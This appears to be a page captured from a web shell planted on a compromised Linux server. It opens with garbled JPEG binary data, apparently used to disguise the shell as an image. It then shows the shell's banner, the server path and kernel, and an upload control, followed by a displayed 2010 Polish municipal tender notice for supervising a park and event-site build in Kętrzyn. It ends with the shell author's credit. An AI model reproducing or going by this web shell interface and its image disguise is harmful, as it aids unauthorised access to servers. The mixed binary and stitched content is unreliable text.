JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100408/98036-N-2010.html

<p class="kh_header"><b>Kętrzyn: Pełnienie nadzoru inwestorskiego inwestycji: Urządzenie terenu przy ulicy Kajki w Kętrzynie do organizacji imprez plenerowych - etap II</b><br>
<b>Numer ogłoszenia: 98036 - 2010; data zamieszczenia: 08.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kętrzyn , ul. Wojska Polskiego 11, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 752 05 20, faks 089 752 05 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ketrzyn.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego inwestycji: Urządzenie terenu przy ulicy Kajki w Kętrzynie do organizacji imprez plenerowych - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: pełnienie nadzoru inwestorskiego inwestycji: Urządzenie terenu przy ul. M. Kajki w Kętrzynie do organizacji imprez plenerowych - etap II, z podziałem na cztery części określone poniżej . 
I CZĘŚĆ:   nadzór inwestorski w branży ogólnobudowlanej
roboty budowlane w zakresie:
1.	obiekty kubaturowe, tj.: 
-kontener sanitarny: 2 szt. (montaż gotowego obiektu) - prefabrykowany element zagospodarowania terenu. 
- budynek reżyserki.
2.	elementy zagospodarowania terenu, tj.: 
- tarasowe ukształtowanie terenu - wykonane z żelbetowych elementów prefabrykowanych oraz kostki betonowej typu -starodruk-, żelbetowe murki oporowe (od strony wschodniej) wykończone kamieniem dekoracyjnym elewacyjnym, odwodnienie liniowe powierzchni z kostki. Na koronie trybun kolumnada ze słupów żelbetowych zwieńczona drewnianą konstrukcją pergoli z drewna twardego (dąb). Pomiędzy kolumnami - przęsła ogrodzenia stalowego spawanego. 
- ogrodzenia: z kształtowników stalowych, spawane, malowane proszkowo (kolor czarny matowy). Długości: wzdłuż pergoli (wys. 190cm)-81mb., wokół placu do imprez plenerowych (wys. 190cm)-120mb., wokół placu zabaw dla dzieci młodszych (wys. 110cm) -71mb.  oraz 8szt. bram i 5 szt. furty.
- prace związane z rozbiórką istniejących obiektów: rozbiórka nawierzchni asfaltowych placu o pow: 2937,6m2, nawierzchni betonowych 467,00m2, usunięcie karp po drzewach drzewach: 111 szt., usunięcie karp po krzewach: 13,6 m2.
- elementy rekreacji: stół do szachów i chińczyka szt1 , stół do gry w szachy szt.4
- nasadzenia roślinne - żywopłoty, krzewy okrywowe, pnącza, drzewa iglaste, ,
 balustrady schodów terenowych. 

II część : nadzór inwestorski w branży drogowej
roboty budowlane w zakresie:
- plac wielofunkcyjny pod scenę i lodowisko sezonowe - z kostki betonowej gr. 8cm -starobruk- z powierzchnią pofałdowaną, na podbudowie z kruszyw łamanych.
- plac zabaw dla dzieci starszych z nawierzchnią naturalną - nawierzchnia trawiasta, w strefie bezpieczeństwa urządzeń żwir okrągły wymywany (tzw.; płukany, 177m2). Plac wyposażony w przeplotnię linową typu -Piramida Cheopsa- (typ średni), zjazd linowy dł. 10m, pomost z belką i trapami, tablica informacyjna z regulaminem.  
- plac zabaw dla dzieci młodszych z nawierzchnią syntetyczną - nawierzchnia syntetyczna typu -Playtop- (422,62m2) , wyposażony w urządzenia: piaskownica o śr. 5m szt.1, karuzela krzyżakowa, dwie huśtawki sprężynowe, huśtawka podwójna z siedziskiem gumowym, zestaw dla dzieci młodszych -przedszkolak 1-, zestaw dla dzieci starszych -zestaw 14-, tablica informacyjna z regulaminem 
- pozostałe wyposażenie: ławki stałe z siedziskiem i oparciem z drewna sosnowego oraz  podstawą betonową wkopywaną w grunt szt. 12, ławki stałe bez oparcia z siedziskiem z drewna sosnowego i podstawą betonową wkopywaną w grunt szt. 7, kosze betonowe na śmieci o poj. 40l. z wkładem metalowym ocynkowanym szt.11, 
- place, chodniki i parkingi - z kostki betonowej typu -starobruk- o gr.8cm i 6cm., o łącznej powierzchni: chodniki - 2080,3m2, drogi i place - 4115m2

III część : nadzór inwestorski w branży sanitarnej
roboty budowlane w zakresie:
elementy sieci podziemnych wodociągowych, sanitarnych (kanalizacji deszczowej) 
- przyłącza:               1. wodociągowe do kontenera sanitarnego z PE50 z zasuwą Dn40 dł. 21,53m.
2. sanitarne do kontenera sanitarnego z PCV 
3. deszczowe z PCV 
- sieci odwodnienia terenu- wg. dokumentacji projektowej w tym odwodnienia liniowe tarasowego ukształtowanie terenu oraz placu przeznaczonego pod lodowisko sezonowe
 
IV część : nadzór inwestorski w branży elektrycznej
roboty budowlane w zakresie:
- budowa oświetlenia ulicznego, parkowego i oświetlenia ciągów pieszych oraz wewnętrznych linii zasilających skrzynki rozdzielnic terenowych R2,R3,R4,R5 (reżyserka) z RG (rozdzielni głównej) wykonanego budynku usługowego.

2. Szczegółowy zakres robót objętych nadzorem inwestorskim inwestycji Urządzenie terenu przy ulicy Kajki w Kętrzynie do organizacji imprez plenerowych - etap II zawiera dokumentacja projektowa - zamieszczona na stronie internetowej Urzędu Miasta/ www.ketrzyn.com.pl/ BIP /Zamówienia Publiczne/.  
3. Wykonanie przedmiotu zamówienia będzie realizowane ze środków własnych Zamawiającego oraz ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013. 4. Wartość robót objętych zamówieniem: 3,5 - 5 mln zł, w tym roboty:
- ogólnobudowlane 750-940 tys zł. brutto, 
- drogowe 2000-2800 tys zł brutto, 
- sanitarne 700-900 tys zł brutto, 
- elektryczne 320-400 tys zł brutto.
5. Szczegółowe informacje dotyczące wykonania zamówienia zawiera wzór umowy, stanowiący załącznik nr 6 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy na zał. nr 2a)-d) do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy na zał. nr 2a)-d) do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy na zał. nr 2a)-d) do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie I części: Nadzór inwestorski w branży ogólnobudowlanej
	- wymagana jest co najmniej jedna osoba posiadająca uprawnienia budowlane w specjalności konstrukcyjno-budowlanej upoważniające do wykonywania nadzoru inwestorskiego, która jednocześnie posiada aktualne zaświadczenie o przynależności do właściwej terytorialnie izby inżynierów budownictwa, oraz opłacone aktualne składki członkowskie w izbach. 
w zakresie II części: Nadzór inwestorski w branży drogowej
	- wymagana jest co najmniej jedna osoba posiadająca uprawnienia budowlane w specjalności drogowej upoważniające do wykonywania nadzoru inwestorskiego, która jednocześnie posiada aktualne zaświadczenie o przynależności do właściwej terytorialnie izby inżynierów budownictwa, oraz opłacone aktualne składki członkowskie w izbach. 
w zakresie III części: Nadzór inwestorski w branży sanitarnej
	- wymagana jest co najmniej jedna osoba posiadająca uprawnienia budowlane w specjalności sanitarnej upoważniające do wykonywania nadzoru inwestorskiego, która jednocześnie posiada aktualne zaświadczenie o przynależności do właściwej terytorialnie izby inżynierów budownictwa, oraz opłacone aktualne składki członkowskie w izbach. 
w zakresie IV części: Nadzór inwestorski w branży elektrycznej
	- wymagana jest co najmniej jedna osoba posiadająca uprawnienia budowlane w specjalności elektrycznej upoważniające do wykonywania nadzoru inwestorskiego, która jednocześnie posiada aktualne zaświadczenie o przynależności do właściwej terytorialnie izby inżynierów budownictwa, oraz opłacone aktualne składki członkowskie w izbach. 

Uwaga: Jedna osoba posiadająca wymagane przez Zamawiającego uprawnienia może pełnić nadzór w zakresie jednej, kilku lub wszystkich części, co Zamawiający potraktuje jako spełnienie wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy na zał. nr 2a)-d) do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz oferty
2) zaakceptowany i zaparafowany wzór umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany wprowadzane do umowy wymagają obustronnej zgody oraz formy pisemnej pod rygorem nieważności z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych.
2. Strony przewidują możliwość zmiany postanowień niniejszej umowy w następujących przypadkach:
a) zmiana sposobu fakturowania w przypadku zmian organizacyjnych oraz wewnętrznych uwarunkowań podmiotów wymienionych w preambule umowy,
b) wystąpienia zdarzeń niezależnych od stron umowy, powodujących potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla Zamawiającego, bez zwiększania ustalonego wynagrodzenia,
c) zmiany terminu realizacji zamówienia ze względu na przedłużenie realizacji inwestycji Urządzenie terenu przy ulicy Kajki w Kętrzynie do organizacji imprez plenerowych  - etap II, ze względu na  niezawinione przyczyny spowodowane przez tzw. siłę wyższą .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ketrzyn.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Kętrzynie
11-400 Kętrzyn
ul. Wojska Polskiego 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2010 godzina 09:00, miejsce: Urząd Miasta w Kętrzynie
11-400 Kętrzyn
ul. Wojska Polskiego 11
(Punkt Obsługi Interesantów  - parter Urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonanie przedmiotu zamówienia będzie realizowane ze środków własnych Zamawiającego oraz ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> nadzór inwestorski w branży ogólnobudowlanej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nadzór inwestorski w branży ogólnobudowlanej
roboty budowlane w zakresie:
1.	obiekty kubaturowe, tj.: 
-kontener sanitarny: 2 szt. (montaż gotowego obiektu) - prefabrykowany element zagospodarowania terenu. 
- budynek reżyserki.
2.	elementy zagospodarowania terenu, tj.: 
- tarasowe ukształtowanie terenu - wykonane z żelbetowych elementów prefabrykowanych oraz kostki betonowej typu -starodruk-, żelbetowe murki oporowe (od strony wschodniej) wykończone kamieniem dekoracyjnym elewacyjnym, odwodnienie liniowe powierzchni z kostki. Na koronie trybun kolumnada ze słupów żelbetowych zwieńczona drewnianą konstrukcją pergoli z drewna twardego (dąb). Pomiędzy kolumnami - przęsła ogrodzenia stalowego spawanego. 
- ogrodzenia: z kształtowników stalowych, spawane, malowane proszkowo (kolor czarny matowy). Długości: wzdłuż pergoli (wys. 190cm)-81mb., wokół placu do imprez plenerowych (wys. 190cm)-120mb., wokół placu zabaw dla dzieci młodszych (wys. 110cm) -71mb.  oraz 8szt. bram i 5 szt. furty.
- prace związane z rozbiórką istniejących obiektów: rozbiórka nawierzchni asfaltowych placu o pow: 2937,6m2, nawierzchni betonowych 467,00m2, usunięcie karp po drzewach drzewach: 111 szt., usunięcie karp po krzewach: 13,6 m2.
- elementy rekreacji: stół do szachów i chińczyka szt1 , stół do gry w szachy szt.4
- nasadzenia roślinne - żywopłoty, krzewy okrywowe, pnącza, drzewa iglaste, ,
 balustrady schodów terenowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nadzór inwestorski w branży drogowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nadzór inwestorski w branży drogowej:
roboty budowlane w zakresie:
- plac wielofunkcyjny pod scenę i lodowisko sezonowe - z kostki betonowej gr. 8cm -starobruk- z powierzchnią pofałdowaną, na podbudowie z kruszyw łamanych.
- plac zabaw dla dzieci starszych z nawierzchnią naturalną - nawierzchnia trawiasta, w strefie bezpieczeństwa urządzeń żwir okrągły wymywany (tzw.; płukany, 177m2). Plac wyposażony w przeplotnię linową typu -Piramida Cheopsa- (typ średni), zjazd linowy dł. 10m, pomost z belką i trapami, tablica informacyjna z regulaminem.  
- plac zabaw dla dzieci młodszych z nawierzchnią syntetyczną - nawierzchnia syntetyczna typu -Playtop- (422,62m2) , wyposażony w urządzenia: piaskownica o śr. 5m szt.1, karuzela krzyżakowa, dwie huśtawki sprężynowe, huśtawka podwójna z siedziskiem gumowym, zestaw dla dzieci młodszych -przedszkolak 1-, zestaw dla dzieci starszych -zestaw 14-, tablica informacyjna z regulaminem 
- pozostałe wyposażenie: ławki stałe z siedziskiem i oparciem z drewna sosnowego oraz  podstawą betonową wkopywaną w grunt szt. 12, ławki stałe bez oparcia z siedziskiem z drewna sosnowego i podstawą betonową wkopywaną w grunt szt. 7, kosze betonowe na śmieci o poj. 40l. z wkładem metalowym ocynkowanym szt.11, 
- place, chodniki i parkingi - z kostki betonowej typu -starobruk- o gr.8cm i 6cm., o łącznej powierzchni: chodniki - 2080,3m2, drogi i place - 4115m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Nadzór inwestorski w branży sanitarnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nadzór inwestorski w branży sanitarnej
roboty budowlane w zakresie:
elementy sieci podziemnych wodociągowych, sanitarnych (kanalizacji deszczowej) 
- przyłącza:               
1. wodociągowe do kontenera sanitarnego z PE50 z zasuwą Dn40 dł. 21,53m.
2. sanitarne do kontenera sanitarnego z PCV 
3. deszczowe z PCV 
- sieci odwodnienia terenu- wg. dokumentacji projektowej w tym odwodnienia liniowe tarasowego ukształtowanie terenu oraz placu przeznaczonego pod lodowisko sezonowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Nadzór inwestorski w branży elektrycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nadzór inwestorski w branży elektrycznej
roboty budowlane w zakresie:
- budowa oświetlenia ulicznego, parkowego i oświetlenia ciągów pieszych oraz wewnętrznych linii zasilających skrzynki rozdzielnic terenowych R2,R3,R4,R5 (reżyserka) z RG (rozdzielni głównej) wykonanego budynku usługowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com